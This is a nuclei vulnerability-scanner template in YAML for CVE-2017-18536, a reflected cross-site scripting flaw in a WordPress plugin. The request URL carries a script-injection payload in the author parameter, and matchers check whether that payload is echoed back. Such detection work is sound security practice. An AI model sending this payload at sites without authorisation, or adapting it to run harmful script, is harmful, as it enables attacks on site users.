nuclei-templates/cves/2017/CVE-2017-18536.yaml

37 lines
1008 B
YAML
Raw Normal View History

2021-07-16 04:20:28 +00:00
id: CVE-2017-18536
info:
name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
2021-07-16 05:11:33 +00:00
description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
reference:
- https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-18536
cwe-id: CWE-79
tags: cve,cve2017,wordpress,xss,wp-plugin
2021-07-16 04:20:28 +00:00
requests:
- method: GET
path:
2021-07-19 05:59:58 +00:00
- "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-07-16 04:20:28 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-19 05:59:58 +00:00
- "</script><script>alert(document.domain)</script>"
2021-07-16 04:20:28 +00:00
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200